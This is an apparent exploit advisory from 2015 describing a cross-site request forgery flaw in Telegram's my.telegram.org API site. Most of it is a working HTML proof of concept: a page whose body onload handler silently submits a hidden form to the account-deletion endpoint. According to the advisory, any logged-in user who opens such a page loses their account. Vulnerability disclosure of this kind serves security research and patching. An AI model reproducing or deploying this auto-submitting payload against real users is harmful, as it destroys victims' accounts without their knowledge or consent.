Telegram API suffers from a cross site request forgery vulnerability. Note that this advisory has site-specific information.
3346efe93694dc1efb9a24623e91929310719737b819e8454c72d7949d12c7af
/***********************************************************************************
** Exploit Title: Telegram API Cross Site Request Forgery
**
** Exploit Author: C4T
**
** Vendor Homepage : http://my.telegram.org
**
** Google Dork: none
**
** Date: 06/27/2015
**
** Tested on: Windows 7
**
************************************************************************************
** Exploit Code:
******************
<body onload="document.exploit.submit()">
<form name="exploit"
action="https://my.telegram.org/deactivate/do_delete"
id="deactivate_phone_form" onsubmit="return sendPassword(event);">
<input type="hidden" name="message" value="ExploitedByC4T">
</form>
*************************************************************************************
** Description:
******************
when a user is logging in telegram API just by openning a web page
containing this exploit his account will be deleted.
Discovered by C4T
@ Ashiyane Digital Security Team.
-------------------------------------------------------
******************************************************************************************
**
** More Details and Explanation:
**
** http://hatrhyme.com/CSRFInTelegram.pdf
**
******************************************************************************************